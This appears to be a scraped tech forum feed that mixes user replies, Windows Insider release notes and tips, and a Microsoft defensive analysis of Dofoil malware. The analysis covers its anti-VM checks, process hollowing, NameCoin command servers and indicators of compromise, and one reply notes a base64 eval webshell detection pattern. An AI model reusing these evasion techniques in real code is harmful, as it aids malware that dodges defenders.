AWS

I will be doing some long needed upgrades to the network this weekend. Expected downtime will be 2-3 hours while new hardware is installed and configured.

Yes attach a zip with the file in it If you scan them the virus scanner will not pick them up as infected because the files themselves are not a virus. Nothing in them triggers the scanner. Once they download and deliver the payload then the virus scanners will pick it up.

Open the php files with notepad and search the file for any lines that begin with base64_decode. An example would be something like this: eval(base64_decode(long_string_of_random_characters) If you find any you can decode the string here to see what it is doing. Base64 Decode and Encode - Online If you find anything like that then the file is calling to an external server to download malware, most of the time a shell script. More then likely someone else on the server is running software that is being exploited and the server is already compromised. That would explain why files randomy showed up on your site.

Hello Windows Insiders! Today, we are releasing Windows 10 Insider Preview Build 17643 (RS5) to Windows Insiders who opted in to Skip Ahead. What’s new in Build 17643 Sets + Office = Awesome Sets with Office 365 makes it easy to group, recall, and refresh data sources for all your projects. Whether updating your Excel budget each month with stock prices and credit card expenses, incorporating data from multiple reports and websites into a PowerPoint, or managing citations for your book report in Word, Sets with Office 365 helps you get more done, faster. With today’s build – Windows Insiders who are also Office Insiders can try out Sets with Office. You must be an Office 365 subscriber running the latest version of the Office 365 desktop apps for the Sets experience to light up. If you’re not already an Office Insider, you can sign-up here. Additionally, if you’re not an Office 365 subscriber, you can sign-up for a trial here. Sets Improvements Sets is now enabled for most desktop (Win32) apps that use a default and non-customized title bar. Apps that customize their title bar will not have Sets (e.g. Paint.exe). If you’ve opened a Microsoft Edge window within Sets, you can now drag that tab around within the set, as well as drop it in another Sets window. Dragging between a Sets window and a standalone Microsoft Edge window does not yet work. NOTE: Some Insiders may see Sets disappear temporarily after installing this build. Sets should return in 1-2 days or upon the next reboot of your PC. Microsoft Edge Improvements Microsoft WebDriver is now a Feature on Demand: We’ve made Microsoft WebDriver a Feature on Demand (FoD) Feature-on-Demand) to make it easier to get the right version for your device. You can install WebDriver by turning on Developer Mode, or by going to Settings > Apps > Apps & features > Manage optional features and installing it standalone. This should address one of the biggest pain points we see from customers around binary mismatches, as FoD’s match the build/branch/flavor automatically. This also means that the standalone download will no longer be made available for insiders or future stable versions of Windows, as installation is now built into Windows. Microsoft WebDriver now gets installed to C:\Windows\System32\ and will automatically be on the PATH for the machine once installed. We are now shipping 64-bit Microsoft WebDriver to x64 machines. Note, there is a known issue for x64 machines building in Visual Studio with Selenium, where by default Visual Studio builds 32bit and will only check the C:\Windows\SysWOW64\ folder for PATH variables. To work around this issue, target and build 64bit from Visual Studio. In a future build, we plan to publish both 32bit and 64bit binaries in our FoD for 64bit machines, which should address this issue. Data Sense Improvements Roaming Usage: Does your device have a SIM? We’ve updated Data Usage Settings to let you know how much data you are using while roaming! The roaming usage info will appear once you start using roaming data. As a reminder, if you’d like to enable or disable roaming altogether, you can find the option under Cellular Settings. Magnifier Improvements Choose where to keep the mouse cursor: We’ve heard your feedback asking us for a way to keep your mouse centered on the screen in Full-Screen mode, and with this build, we’re making it happen! This new option under Settings > Ease of Access > Magnifier > “Keep your mouse…” > “centered on the screen” enables easier tracking and use of the mouse, especially helpful at higher magnification levels. More options for increments: You’ve also been asking for even more control of your zoom level increments, so we’ve taken a moment to add two new increments to the list: 5% and 10%. We love feedback! In case you haven’t noticed it already, we have a new Magnifier node in the Feedback Hub under Ease of Access > Magnifier. We’re looking forward to hearing your thoughts about using Magnifier – click this link to open our section in the Feedback Hub. General changes, improvements, and fixes for PC We fixed an issue where Reveal would sometimes not appear if you moved your mouse over and off an element repeatedly. We fixed an issue resulting in a noticeable screen flicker when the screen adjusts after rotating your device. We fixed an issue where the spellchecking menu would always appear on the primary monitor on PCs with multiple monitors, rather than the monitor with the red squiggled word. Known issues If you open Settings and clicking on any links to the Microsoft Store or links in tips, Settings will crash. This includes the links to get themes and fonts from the Microsoft Store, as well as the link to Windows Defender. On resuming from sleep, the desktop may be momentarily visible before the Lock screen displays as expected. When Movies & TV user denies access to its videos library (through the “Let Movies & TV access your videos library?” popup window or through Windows privacy settings), Movies & TV crashes when the user navigates to the “Personal” tab. Tiling and cascading windows, including features like “View Side by Side” in Word, will not work for inactive tabs. The Office Visual Basic Editor window will currently be tabbed but is not intended to be in the future. Opening an Office document while the same app has an existing document open may cause an unintended switch to the last active document. This will also happen when closing a sheet in Excel while other sheets remain open. Local files or non-Microsoft cloud files will not be automatically restored and no error message will be provided to alert the user to that fact. Sets UX for Office Win32 desktop apps is not final. The experience will be refined over time based on feedback. The top of some Win32 desktop app windows may appear slightly underneath the tab bar when created maximized. To work around the issue, restore and re-maximize the window. Closing one tab may sometimes minimize the entire set. File Explorer ribbon doesn’t stay pinned open across restart. We’re aware of an issue that causes Narrator to read extra text when invoking Alt + Tab, and we’re working on a fix. Using arrow and Page Up / Page Down keys doesn’t work to scroll webpages in Microsoft Edge. You’ll need to use another input method (mouse, touch, or touchpad). No downtime for Hustle-As-A-Service, Dona The post Announcing Windows 10 Insider Preview Build 17643 for Skip Ahead appeared first on Windows Experience Blog. Continue reading...

This actually was on the news this morning. I think this could be worse then the Facebook stuff.

It does change the first time you post after you upgrade/change browser or switch OS. It doesn't change any of the older posts.

To experience Windows Mixed Reality, you’ll need a few things: a compatible Windows 10 PC, a Windows Mixed Reality headset, and the Windows 10 Fall Creators Update for your PC. For the best experience, you’ll also want a pair of Windows Mixed Reality motion controllers. Now, all set up but not sure where to begin? Here’s a list of ten things for you to try in Windows Mixed Reality right now. Personalize your display Before you start playing in mixed reality, you’ll want to adjust your headset display for your interpupillary distance (IPD). Since everyone has a different distance between their eyes, it’s important to change your headset’s software settings to match your own IPD for the best image quality and depth accuracy when you play. You can set your custom IPD via Settings > Mixed Reality > Headset display > Calibration.[1] Customize your mixed reality home The first thing you’ll see when you launch Windows Mixed Reality and put on your headset is your mixed reality home, your home base for discovering specific apps or experiences. Here, you can customize each room to your liking. Open the Start menu to pin your favorite apps to the walls and go to Start > Holograms to add furniture, people, and other holograms to your space. Navigate in mixed reality There are several ways to get around in mixed reality with your motion controllers. To teleport, point your controller to where you want to go, press either thumbstick forward, and release to instantly land there. To rotate, press your thumbstick left or right, and to back up, press it back. To walk continuously, press either thumbstick straight down and move it in the direction you want to go. Use Cortana in mixed reality Did you know you can use Cortana while in Windows Mixed Reality? Cortana can help you get around faster with your voice. For example, you can have Cortana adjust the volume in a game, open an app, and even teleport without a controller. Simply start with “Hey Cortana,” to try it now.[2] Play games in Steam®VR Did you know that in addition to your favorite apps from the Microsoft Store, you can access more than 2,500 amazing games and VR experiences through Steam®VR for Windows Mixed Reality? [3] To get set up, go to aka.ms/steamvr on your PC. Once you’ve launched Steam®VR from your headset, use your motion controllers and press straight down on the left or right thumbstick to open the dashboard and start exploring. Watch immersive videos on the web Immerse yourself in 360° videos and photos on the web. Get the 360 Viewer extension for Microsoft Edge and put on your headset to browse immersive content from YouTube, Facebook, NYTimes.com, and more. Take a closer look in mixed reality For a closer look at any open app, you can zoom with your motion controllers. To zoom in, point at an app window with both controllers, pull both triggers, and move your hands apart. To zoom back out, bring your hands together. View apps from the best angle To perfectly center yourself in front of an app, bounce your teleport off the open app window. To do this, press your thumbstick forward, aim the controller at the app you want to use, and release the thumbstick to land exactly in front of the app window. Adjust the floor of your mixed reality home Sometimes, the floor of your Windows Mixed Reality home may feel slanted or at the wrong height. If it doesn’t feel comfortable to you, you can change the floor height via Start > Room Adjustment. Just follow the instructions and use the touch pad on your motion controller to get your floor feeling right in no time. Share your experience with others Use the Mixed Reality Portal to share the fun with friends. From your compatible PC, select the Play button to show the view from your headset on your computer screen.3 These are just a few of the many things you can do in Windows Mixed Reality. To learn more, check out Windows Mixed Reality Support and the mixed reality tips page for even more inspiration. [1] In addition, the Samsung HMD Odyssey headset has a mechanical IPD adjuster. [2] To experience sound, Cortana and voice dictation, compatible mic-enabled headphones with 3.5mm jack (USB won’t be able to connect to headset) have to be attached, plugged in to the audio jack on the HMD. Consumers may find compatible headphones by looking for the Cortana badge or Circle icon on product packaging and websites. [3] PC hardware requirements may vary for available apps, features and content. The post Windows 10 Tip: 10 things you can do in Windows Mixed Reality right now appeared first on Windows Experience Blog. Continue reading...

I've been following this. It keeps getting worse as the investigation deepens.

Hello Windows Insiders! Today, we are releasing Windows 10 Insider Preview Build 17639 (RS5) to Windows Insiders who have opted into Skip Ahead. What’s new in Build 17639 The next wave of Sets improvements is here What belongs together stays together – we designed Sets to help you keep webpages, documents, files, and apps connected. We’ve been hard at work since our first wave of Sets improvements for RS5, and when you install today’s build you’ll find: Drag and drop app tabs within and between Sets windows is now supported: It works just like it sounds! You can now drag an app tab around within the Set or combine tabbed app windows into Sets. Note: If you open a Microsoft Edge tab outside of a Set, you can’t drag and drop it into a Sets window. Drag and drop for Microsoft Edge web tabs within Sets isn’t supported yet and you may experience a crash if this is attempted. Tabs are now bubbled up in Alt + Tab: Have Photos, Microsoft Edge, and OneNote tabbed together? You can now use Alt + Tab to switch between them. Prefer to only show the primary window in Alt + Tab? There’s a new setting – more on that in just a moment… Note: If you have multiple Microsoft Edge windows in a Set, only the one most recently accessed will be visible in Alt + Tab. Improved Settings for Sets: We’ve updated the Settings for Sets via Settings > System > Multitasking. To start with, Sets now has its own section on this page, and is searchable (try typing “Sets” or “tabs” and it will appear in the dropdown). We’ve also added a setting to control the Alt + Tab behavior mentioned above. File Explorer & Sets Improvements: We’ve heard your feedback – you’d like it to be easier to get two File Explorer windows grouped together, and we’re working on it. To start with, you no longer need to hold CTRL on the new tab page to launch a File Explorer window in a tab (this was a temporary necessity with the last wave). We’ve also added a new keyboard shortcut to open a new tab when a File Explorer window is in focus: Ctrl + T. Remember, you can use Ctrl + N to open a new window, and Ctrl + W to close the window/tab. Finally, we’ve added some new UI for easily opening new tabs and windows in the File Menu. And also, in the context menu when right-clicking on a folder. New context menu options for tabs in Sets: If you right-click on a Sets tab, you’ll discover we’ve added several options for you to leverage, including “close other tabs”, “move to new window”, and “close tabs to the right”. Improvements to Previous Tabs: We’ve done a few things to improve the experience in this space, including: You can now pick and choose which Previous Tabs you want to restore, instead of only being able to restore all tabs. Note: if you use the Sets activity card in Timeline, it will automatically restore all tabs. You can now restore Previous Tabs from any type of activity – whereas with the previous wave of features we only supported restoring tabs when the primary window was a document. When you open a document that previously had tabs, a prompt will appear offering to restore those tabs, and the Previous Tabs button will be in the filled state. For things that aren’t documents, a prompt will not automatically appear, but you’ll know that there are tabs available to restore because the Previous Tabs button will be in the filled state. We added an animation to the experience when there are no Previous Tabs available to be restored. Other Sets improvements and fixes based on your feedback, including: We fixed an issue where the active tab color wouldn’t be visible until you hovered over it. We’ve been working on our polish, and you’ll notice that switching between open tabs is now a lot smoother. We’ve improved the reliability when restoring tabs, fixing some issues where tabs didn’t restore as expected. We fixed an issue where closing a tab in a Set then immediately opening a new tab might result in the window unexpectedly maximizing. Here are a few things we’re still working on that aren’t quite finished / resolved yet: File Explorer ribbon doesn’t stay pinned open across restart.It may take some time for the app exclude list in Sets settings to populate the first time it’s opened. Sometimes it takes two tries to bring up an inactive tab from the taskbar. There’s a chance that you may see an unexpected second row of tabs when you open the new tab page. When you launch an app or website from the new tab page, there’s a chance focus will change to a different tab. The “filled” state of the restore icon in Sets will remain filled even though you’ve restored all tabs. We’re aware of an issue that causes Narrator to read extra text when invoking Alt + Tab, and we’re working on a fix. The new tab may sometimes open blank. Closing the tab then opening it again should resolve this issue. Coming soon: We’re planning to enable Sets for more Win32 (desktop) apps including Office! In order to try this new experience out with Office, you’ll need to be an Office Insider running the latest Office builds. Sign-up to be an Office Insider today if you aren’t already! Bluetooth battery percentage in Settings In Bluetooth & other devices Settings, you can now check the battery level of your Bluetooth devices. For Bluetooth devices that support this feature, the battery percentage will update whenever your PC and the device are connected. Windows Calculator Improvements Windows Calculator has been updated (version 10.1803.711.0) to now correctly calculates square roots for perfect squares (integers that are squares of other integers). Because of the arbitrary precision arithmetic library used by the Calculator app, the square root calculation is an approximation calculated using the Exponential Identity function. Previously, when you would calculate the square root of 4, the result would be 1.99999999999999999989317180305609 which would be rounded to 2 when displayed, because we calculated enough digits to do the rounding correctly. However, as soon as you subtract 2, you would see the remaining digits. After this update, the square root calculation now recognizes perfect squares and correctly returns exactly 2 for the square root of 4. General changes, improvements, and fixes for PC We fixed an issue resulting in duplicate entries in Disk Management. We fixed an issue that could result in certain UWP apps silently terminating when minimized. We fixed an issue resulting in certain devices with BitLocker enabled unexpectedly booting into BitLocker recovery in recent flights. We fixed a race condition that could result in the taskbar not autohiding after opening and closing the Start menu while a fullscreen window was visible. We fixed an issue where typing in Start would switch to a blank Cortana screen if Start was open when the PC went to sleep. We fixed an issue when using Arabic as your display language where after using the X to close the touch keyboard in a UWP app text field it might stop coming up automatically in that field. Sometimes having too many choices can be confusing and less is more. That is why this new build has consolidated the places where users can adjust their display brightness by removing the display brightness slider in Control Panel Power Options and the “Display brightness” section under Power Options Advanced Settings. Don’t worry! You can still adjust your display brightness via Settings > System > Display settings, the Action Center, and via keyboard hot keys. Known issues If you open Settings and clicking on any links to the Microsoft Store or links in tips, Settings will crash. This includes the links to get themes and fonts from the Microsoft Store, as well as the link to Windows Defender. On resuming from sleep, the desktop may be momentarily visible before the Lock screen displays as expected. When Movies & TV user denies access to its videos library (through the “Let Movies & TV access your videos library?” popup window or through Windows privacy settings), Movies & TV crashes when the user navigates to the “Personal” tab. Recommended Training for Windows Insiders We’d like to take this opportunity to highlight some training courses that might interest some Windows Insiders from the Microsoft Professional Program: For Windows Insiders interested in taking the first step in becoming an AI engineer, check out this track here on Artificial Intelligence. You should also check out GeekWire’s article covering the track too! For Windows Insiders interested in diving deeper into the world of IT support, check out this track here. Insider Story Check out this article on the Windows Insider website to find out how Windows Insider Vincent Pendleton uses Paint 3D as a go-to tool for teaching astronomy! No downtime for Hustle-As-A-Service, Dona The post Announcing Windows 10 Insider Preview Build 17639 for Skip Ahead appeared first on Windows Experience Blog. Continue reading...

Dofoil is a sophisticated threat that attempted to install coin miner malware on hundreds of thousands of computers in March, 2018. In previous blog posts we detailed how behavior monitoring and machine learning in Windows Defender AV protected customers from a massive Dofoil outbreak that we traced back to a software update poisoning campaign several weeks prior. Notably, customers of Windows 10 S, a special Windows 10 configuration that provides streamlined Microsoft-verified security, were not affected by the Dofoil outbreak. In this blog post, we will expound on Dofoils anti-debugging and anti-analysis tactics, and demonstrate how the rich detection libraries of Windows Defender Advanced Threat Protection and Windows Defender Exploit Guard can help during investigation. We found that Dofoil was designed to be elusive to analysis. It checks its environment and stops running in virtual machine environments. It also checks for various analysis tools and kills them right away. This can make malware analysis and assessment challenging. The following diagram shows the multi-stage malware execution process, which includes checks for traits of analysis environments during some stages. Figure 1. Dofoil multi-stage shellcode and payload execution flow The table below describes the purpose of each stage. The first five stages have at least one or two different techniques that can deter dynamic or static malware analysis. STAGES DESCRIPTION 1. Obfuscated wrapper code Anti-heuristics Anti-emulation 2. Bootstrap module Performs self-process hollowing to load the next module 3. Anti-debugging module Performs anti-debugging operation 4. Trojan downloader module Performs system environment checks Performs anti-VM operation Injects itself to explorer.exe through process hollowing 5. Trojan downloader module in explorer.exe Contacts C&C server to download trojan and run it using process hollowing technique 6. Payload downloader module in explorer.exe Contacts C&C server to download the main payload 7. Trojan module Steals credentials from various application settings and sends stolen into to the C&C server over HTTP channel 8. CoinMiner.D Mines digital currencies Table 1. Dofoil’s multi-stage modules Initial stages The first three stages (i.e., obfuscated wrapper code, bootstrap module, anti-debugging module) use the following techniques to avoid analysis and identification. ANTI-ANALYSIS TECHNIQUES DESCRIPTION Benign code insertion Inserts a huge benign code block to confuse heuristics and manual inspection Anti-emulation Enumerates an arbitrary registry key (HKEY_CLASSES_ROOT\Interface\{3050F557-98B5-11CF-BB82-00AA00BDCE0B}) and compares the data with an expected value (DispHTMLCurrentStyle) to check if the malware runs inside an emulator Self-process hollowing Uses the process hollowing technique on the current process, making analysis extra difficult due to the altered code mapping Debugger checks Checks for debuggers, and modifies code to crash. This can add additional layer of confusion to researchers, who are bound to investigate the cause of the crashes. It checks for the PEB.BeingDebugged and PEB.NtGlobalFlag fields in the PEB structure. For example, PEB.BeingDebugged is set to 1 and PEB.NtGlobalFlag is set to FLG_HEAP_ENABLE_TAIL_CHECK|FLG_HEAP_ENABLE_FREE_CHECK| FLG_HEAP_VALIDATE_PARAMETERS when a debugger is attached to the process. Table 2. Anti-analysis techniques The first stage contains some benign-looking code before the actual malicious code. This can give the executable a harmless appearance. It can also make the emulation of the code difficult because emulating various API calls that are not present in many malware codes can be challenging. The first-stage code also performs a registry key enumeration to make sure it has the expected value. When all checks are passed, it decodes the second-stage shellcode and runs it on the allocated memory. This shellcode un-maps the original main modules memory, and then decodes the third-stage shellcode into that memory this is known as a self-process hollowing technique. Figure 2. Self-modification based on PEB.BeingDebugged value Windows Defender ATPs process tree can help with investigation by exposing these anti-debugging techniques. Figure 3. Windows Defender ATP process tree showing anti-debugging techniques Trojan downloader module The trojan downloader module performs various environment checks, including virtual environment and analysis tool checks, before downloading the payload. ANTI-ANALYSIS TECHNIQUES DESCRIPTION Check module name Checks if the main executable name contains the string “sample” Check volume serial Checks if current volume serial number is 0xCD1A40 or 0x70144646 Check modules Checks the presence of DLLs related to debuggers Check disk-related registry keys Checks the value of the registry key HKLM\System\CurrentControlSet\Services\Disk\Enum against well-known disk name patterns for virtual machines (qemu, virtual, vmware, xen, ffffcce24) Process check Checks running processes and kills those with processes names associated with analysis tools (procexp.exe, procexp64.exe, procmon.exe, procmon64.exe, tcpview.exe, wireshark.exe, processhacker.exe, ollydbg.exe, idaq.exe, x32dbg.exe) Windows class name check Checks the current Windows class names and exits when some well-known names are found (Autoruns, PROCEXPL, PROCMON_WINDOW_CLASS, TCPViewClass, ProcessHacker, OllyDbg, WinDbgFrameClass) Table 3. Anti-analysis techniqueof Dofoil’s trojan downloader module The list of target process names and Windows class names exist in custom checksum form. The checksum algorithm looks like the following: Figure 4. Shift and XOR custom checksum algorithm The purpose of this checksum is to prevent malware researchers from quickly figuring out what analysis tools it detects, making analysis more time-consuming. STRING CHECKSUM Autoruns 0x0E5C1C5D PROCEXPL 0x1D421B41 PROCMON_WINDOW_CLASS 0x4B0C105A TCPViewClass 0x1D4F5C43 ProcessHacker 0x571A415E OllyDbg 0x4108161D WinDbgFrameClass 0x054E1905 procexp.exe 0x19195C02 procexp64.exe 0x1C0E041D procmon.exe 0x06185D0B procmon64.exe 0x1D07120A tcpview.exe 0x060B5118 wireshark.exe 0x550E1E0D processhacker.exe 0x51565C47 ollydbg.exe 0x04114C14 x32dbg.exe 0x5F4E5C04 idaq.exe 0x14585A12 Table 4. String checksum table used for process names and Windows class names Process hollowing Dofoil heavily uses the process hollowing technique. Its main target for process hollowing is explorer.exe. The Dofoil shellcode launches a new instance of explorer.exe, allocates shellcode in heap region, and then modifies the entry point code to jump into the shellcode. This way, the malware avoids using CreateRemoteThread API, but can still achieve code injection. Figure 5. Modification of explorer.exe entry point code Windows Defender ATP can detect the process hollowing behavior with advanced memory signals. The following process tree shows that the malware injects itself into explorer.exe using the process hollowing technique. Figure 6. Windows Defender ATP alert process tree showing the first process hollowing When the shellcode downloads another layer of payload, it spawns another explorer.exe to inject the payload into using process hollowing. Windows Defender ATP can save analysis time on these cases by pinpointing the malicious actions, eliminating the need for guessing what these newly spawned Windows system processes are doing. Figure 7. Windows Defender ATP alert process tree showing the second process hollowing The process hollowing behavior can be detected through Exploit protection in Windows Defender Exploit Guard. This can be done by enabling the Export Address Filter (EAF) mitigation against explorer.exe. The detection happens when the shellcode goes through the export addresses of the modules to find the export address of the LoadLibraryA and GetProcAddress functions. Figure 8. Export Address Filter (EAF) event exposed in Event viewer Windows Defender Exploit Guard events are also exposed in the Windows Defender ATP portal: Figure 9. Windows Defender ATP view of the Windows Defender Exploit Guard event Adding Windows Defender Exploit Guard EAF audit/block policy to common system processes like explorer.exe, cmd.exe, or verclsid.exe can be useful in finding and blocking process hollowing or process injection techniques commonly used by malware. This policy can impact third-party apps that may behave like shellcode, so we recommend testing Windows Defender Exploit Guard with audit mode enabled before enforcement. Command-and-control (C&C) and NameCoin domains Dofoils C&C connection is very cautious. The trojan code first tries to connect to well-known web pages and verifies that the malware has proper and real Internet connection, not simulated as in test environments. After it makes sure it has a real Internet connection, the malware makes HTTP connections to the actual C&C servers. Figure 10. Access to known servers to confirm Internet connectivity The malware uses NameCoin domain name servers. NameCoin is a decentralized name server system that provides extra privacy backed by blockchain technology. Except for the fact that the DNS client needs to use specific sets of NameCoin DNS servers, the overall operation is very similar to a normal DNS query. Because NameCoin uses blockchain technology, you can query the history of the domain name changes through blocks. Figure 11. Malicious hostname DNS entry changes over time (Namecoin Block Explorer) Windows Defender ATP can provide visibility into the malwares network activities. The following alert process tree shows the malwares .bit domain resolution activity and, after that, the connections to the resolved C&C servers. You can also view other activities from the executable, for example, its connections to other servers using SMTP ports. Figure 12. Windows Defender ATP alert process tree showing C&C server connection through NameCoin server name resolution The Windows Defender ATP advanced hunting feature, which is currently in preview, can be used to hunt down more malware samples that possibly abuse NameCoin servers. For example, the following query will let you view recent connections observed in the network. This can lead to extra insights on other threats that use the same NameCoin servers. Figure 13. Advanced hunting for other threats using the same NameCoin servers The purpose of using NameCoin is to prevent easy sinkholing of the domains. Because there are no central authorities on the NameCoin domain name records, it is not possible for the authorities to change the domain record. Also, malware abusing NameCoin servers use massive numbers of NameCoin DNS servers to make full shutdown of those servers very difficult. Conclusion Dofoil is a very evasive malware. It has various system environment checks and tests Internet connectivity to make sure it runs on real machines, not in analysis environments or virtual machines. This can make the analysis time-consuming and can mislead malware analysis systems. In attacks like the Dofoil outbreak, Windows Defender Advanced Threat Protection (Windows Defender ATP) can help network defenders analyze the timeline from the victim machine and get rich information on process execution flow, C&C connections, and process hollowing activities. Windows Defender ATP can be used as an analysis platform with fine-tuned visibility into system activities when set up in a lab environment. This can save time and resource during malware investigation. In addition, Windows Defender Exploit Guard can be useful in finding malicious shellcodes that traverse export address tables. Windows Defender Exploit Guard can be an excellent tool for finding and blocking malware and exploit activities. Windows Defender Exploit Guard events are surfaced in the Windows Defender ATP portal, which integrates protections from other Microsoft solutions, including Windows Defender AV and Windows Defender Application Guard. This integrated security management experience makes Windows Defender ATP a comprehensive solution for detecting and responding to a wide range of malicious activities across the network. Windows 10 S, a special configuration of Windows 10, locks down devices against Dofoil and other attacks by working exclusively with apps from the Microsoft Store and using Microsoft Edge as the default browser. This streamlined, Microsoft-verified platform seals common malware entry points. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial. Matt Oh, Stefan Sellmer, Jonathan Bar Or, Mark Wodrich Windows Defender ATP Research Indicators of compromise (IoCs) TrojanDownloader:Win32/Dofoil.AB: d191ee5b20ec95fe65d6708cbb01a6ce72374b309c9bfb7462206a0c7e039f4d eaa63f6b500afedcaeb8d5b18a08fd6c7d95695ea7961834b974e2a653a42212 cded7aedca6b54a6d4273153864a25ccad35cba5cafeaec828a6ad5670a5973a Trojan:Win32/Dofoil.AB: 070243ad7fb4b3c241741e564039c80ca65bfdf15daa4add70d5c5a3ed79cd5c 5f3efdc65551edb0122ab2c40738c48b677b1058f7dfcdb86b05af42a2d8299C 28ce9763a808c4a7509e9bf92d9ca80212a241dfa1aecd82caedf1f101eac692 5d7875abbbf104f665a0ee909c372e1319c5157dfc171e64ac2bc8b71766537f Trojan:Win32/CoinMiner.D 2b83c69cf32c5f8f43ec2895ec9ac730bf73e1b2f37e44a3cf8ce814fb51f12 C&C URLs: hxxp://levashov.bit/15022018/ hxxp://vrubl.bit/15022018/ C&C server: vinik.bit Related .bit domains (updated in same block as C&C server): henkel.bit makron.bit makronwin.bit NameCoin servers used by Dofoil: 139.59.208.246 130.255.73.90 31.3.135.232 52.174.55.168 185.121.177.177 185.121.177.53 62.113.203.55 144.76.133.38 169.239.202.202 5.135.183.146 142.0.68.13 103.253.12.18 62.112.8.85 69.164.196.21 107.150.40.234 162.211.64.20 217.12.210.54 89.18.27.34 193.183.98.154 51.255.167.0 91.121.155.13 87.98.175.85 185.97.7.7 Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence. Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence. Continue reading...

It works very well. I also installed the other addon referenced in the article and set up Twitter and a couple other sites in their own container.

Probably will save them millions if not more. Purely a business decision.

I installed it.

Write and draw even more naturally Using a pen feels natural with tilt* support, letting you draw and shade just like you would with paper and pencil. Simply select the Pencil tool, angle your pen slightly, and watch as your ink stroke changes from a point to a more natural angle. Draw with dazzling ink Spice up your notes and sketches with fun ink effects** like rainbow, galaxy, gold, silver, lava, ocean, and more. Clean up your notes OneNote lets you convert your handwritten notes into text, making them more presentable and easier to read. It’ll even preserve the size and color of your ink, as well as highlights and ink effects like rainbow and galaxy! Set things straight with the ruler Can’t draw a straight line to save your life? Don’t worry. With the new digital ruler, drawing a perfectly straight line is a breeze. Solve and graph handwritten math equations Improve your math skills with the Ink Math Assistant**. OneNote can solve math equations and show you the steps to find the answer. It can even graph the equation and calculate the minima, maxima, or axes intercepts. If you’d like to convert the equation to typed text, it can do that too. OneNote comes free with Windows 10, so you can start using it today. The app is updated every month with new features and improvements, so let us know via the Feedback Hub or UserVoice if there’s something you’d like to see added in the future. *Tilt functionality available on select devices at launch. **Requires Office 365 The post Windows 10 Tip: Five expert tips to help you master ink in OneNote appeared first on Windows Experience Blog. Continue reading...

No problem. I was out most of the weekend too.

I had no idea this could happen.

Thanks Cindy. Also welcome back Cindy.

Even if you get them from Google in the android app store you'll still be vulnerable. Apps are not checked when submitted so anything can be in them. Say what you want about Apple but not just anyone can submit an app. They make it tough for devs to get their apps listed in the app store, but, you get good quality clean from virus. Not saying it'a 100% perfect. You're just less likely to get anything malicious.

Hello Windows Insiders! Today, we are releasing Windows 10 Insider Preview Build 17634 (RS5) to Windows Insiders who have opted into Skip Ahead. What’s new in Build 17634 Search is now available in Calendar for Windows 10! Now you can find past or future events by searching for the name, location, people included or words in the event body. Events that match your search will be clearly visible on your calendar, while those that don’t will be greyed-out so you can find what you need quickly. Search will work for Outlook, Hotmail, Live and Office 365 accounts. We do not yet support searching Exchange Server, Gmail, Yahoo or other IMAP calendars. Cortana Show Me now supports voice queries Last week, we introduced Cortana Show Me, a preview app designed to show you around Windows 10 settings. We’re here with some updates to try – you can now launch the app through voice queries. Simply say to Cortana, “Show me how to change my background,” and you’ll get the previous help results, with a new “Let’s go” button below, which launches the guided help experience. Everything else is the same as last week – the app is available in English (US and Great Britain) and in German, and there are 15 settings guides. While most Insiders don’t need pointers like this, it’s for all the friends and family we have who need a pointer – please share it with them. You can download Cortana Show Me from Microsoft Store. Note: If you’re using keyboard navigation with your device, you will need to use Alt + Tab to move between Settings and Cortana Show Me. Here are some voice queries to try: Update Windows – Try, “Update my Windows device” Check if an app is installed – Try, “How to see what apps are installed” Uninstall an app – Try “How to uninstall apps” Change your desktop background – Try, “Show me how to change my background” Use Airplane Mode – Try, “How do I turn on airplane mode” Change your display brightness – Try, “Show me how to change my screen brightness” Add nearby printers or scanners – Try, “How to add a printer” Turn off Windows Defender Security Center – Try, “Show me how to turn off Windows Defender Security Center” Change Wi-Fi settings – Try, “Show me how to change Wi-Fi network” Change your power settings – Try, “How to change when my computer goes to sleep” Discover Bluetooth devices – Try, “Show me how to discover devices” Check your version of Windows – Try, “How do I find my current version of Windows” General changes, improvements, and fixes for PC We fixed an issue where typing in the Microsoft Edge URL bar immediately after opening a new tab might result in the letters appearing in an unexpected order. We fixed an issue when opening .html or .pdf files from the local system (double-click, right-click > open), Microsoft Edge will not render the loaded content if Microsoft Edge wasn’t already running before opening the file. We fixed an issue where PDFs displayed using Microsoft Edge would shrink after refreshing the page when using a DPI scaling > 100%. We fixed an issue that could result in Microsoft Edge crashing when turning off certain extensions. We fixed an issue resulting in Task Manager not showing the application title in the process name for open Visual Studio projects. We fixed an issue resulting in the UAC dialog potentially not rendering correctly in the last few flights. We fixed an issue resulting in certain devices with BitLocker enabled unexpectedly booting into BitLocker recovery in recent flights. We fixed an issue where the Emoji Panel would close after typing an accent in certain languages. We fixed an issue resulting in focus being lost after using WIN+A to close the Action Center. Known issues If you open Settings and clicking on any links to the Microsoft Store or links in tips, Settings will crash. This includes the links to get themes and fonts from the Microsoft Store, as well as the link to Windows Defender. On resuming from sleep, the desktop may be momentarily visible before the Lock screen displays as expected. When Movies & TV user denies access to its videos library (through the “Let Movies & TV access your videos library?” popup window or through Windows privacy settings), Movies & TV crashes when the user navigates to the “Personal” tab. REMINDER: Sign up to be an Office Insider! Our friends on the Office team want to reiterate their invitation for Windows Insiders to participate in feedback and product usage which will inform the next generation of Office innovations! Windows and Office are continually looking for the best-connected experiences. Your feedback is extremely valuable to us and will help us to understand customer needs and scenarios and to prioritize our investments in the coming months. Please join the Office Insider Program to help directly affect product design decisions! No downtime for Hustle-As-A-Service, Dona The post Announcing Windows 10 Insider Preview Build 17634 for Skip Ahead appeared first on Windows Experience Blog. Continue reading...

That I'm unsure of although I would think not. I know when I installed it on Windows 7 it gave me a warning that I should uninstall any other AVS. It did work well with MalwareBytes.

